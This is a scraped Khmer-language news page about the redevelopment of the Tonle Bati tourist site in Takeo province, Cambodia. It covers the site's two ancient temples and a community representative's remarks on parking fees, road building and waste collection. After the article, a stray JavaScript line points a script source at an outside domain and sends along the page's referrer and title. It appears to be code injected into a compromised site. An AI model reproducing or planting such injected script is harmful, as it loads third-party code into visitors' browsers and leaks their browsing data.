ព្រឹតិ្តការណ៍ថ្មីៗ

(Video)រម្មណីដ្ឋានទន្លបាទី ជាតំបន់ទេសចរណ៏ បានអភិវឌ្ឍន៏ថ្មីខេត្តតាកែវ

2 ឆ្នាំ មុន 74 tnn_admin

ខេត្តតាកែវ ៖ ស្ថិតក្នុងរូបភាពចាស់បានផ្លាស់ប្តូនូវរូបភាពថ្មី ក្រោយពីមានការអភិវឌ្ឍន៏ មួយចំនួននៃតំបន់ទេសចរណ៏ ក្នុង​រម្មណីដ្ឋានទន្លបាទី។ បើយើងក្រឡេកទៅមើលតំបន់ទេសចរណ៏វិញ ស្ថិតនៅទីរួមខេត្តតាកែវ គឺមានជាច្រើនកន្លែង តែប្លែកជាងគេនោះ គឺតំបន់ទេសចរណ៏រម្មណីដ្ឋានទន្លេបាទី ដែលស្ថិតនៅភូមិទន្លេបាទី ឃុំក្រាំងធ្នង់ ក្នុងស្រុកបាទ​ បានទាក់ទាញភ្ញៀវទេសចរជាតិ និងអន្តរជាតិទៅទស្សនាយ៉ាងច្រើនព្រោះនៅតំបន់នោះមានកញ្ចុះ នៅតាមមាត់ទន្លេនិងមានខ្យល់អាកាសបរិសុទ្ធធ្វើអោយភ្ញៀវជាតិ និងអន្តរជាតិទៅលំហែកាយ ក្រោយពេលសំរាកពីការងារ ក៏ដូចមានពេលបុណ្យទានម្តងៗ​ផងដែរ ។

មិនតែប៉ុណ្ណោះរឿងសំខាន់ជាងនេះទៅទៀតនោះ នៅរម្មណីដ្ឋានទន្លេបាទី​ ក៏មានប្រាសាទចំនូន២ គឺ​ ប្រាសាទយាយពៅ ស្ថិតនៅក្នុងវត្តបាទី និងប្រាសាទតាព្រហ្មនៅខាងត្បូងវត្តបាទី ដែលជាស្នាដៃរបស់បុព្វពាក់បុរស់ជុំដើម បានកសាងបន្យល់ទុកអោយកូនខ្មែជំនាន់ក្រោយសំរាប់ទស្សនាយល់ដឹង។

ទន្ទឹមនឹងនោះផងដែរអ្នកយកព័ត៍មានយើងលោកតាំង សុខន បានជំនួប​លោក វែន ណេ តំណាងសហគមន៏រម្មណីដ្ឋានទន្លេ​បាទី ដើម្បីអោយលោកជួយផ្តល់ព័ត៍មាន តំណាងសហគមន៏រម្មណីដ្ឋានទន្លេ​បាទីលោក វែន ណេ បានអោយដឹងផងដែរថា៖នៅតំបន់រម្មណីដ្ឋានទន្លេបាទីឥឡូវនេះមិនដូចពីមុនទេ ព្រោះសហគមន៏របស់លោកតម្រូវអោយយក(វិភាគទាន)ពីរថយន្តភ្ញៀវ បើរថយន្តតូច១ក្នុងតម្លៃ៣០០០រៀល ហើយរថយន្តធំមូយតម្លៃ៥០០០រៀល​​ ហើយថវិការដែលបានមកនោះ គឺយកមកស្ថាបនាផ្លូវអោយងាយស្រួលដល់ភ្ញៀវជាតិនិងអន្តជាតិពេលធ្វើរដំណើរទៅមក។ លោកបន្តថា លោកនឹងរករថយន្តសំរាប់ដឹកកាកសំណល់សំរាមដែលសេសសល់ អំពីភ្ញៀវបរិភោគយកទៅចោលកន្លែងឆ្ងាយដើម្បីអោយមានបរិស្ថានល្អ និងកែមុខម្ហូបមិនអោយថ្លៃពេក តម្លៃសមរម្យដើម្បីតម្រូវចិត្តភ្ញៀវ…៕(ដោយសុខន)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ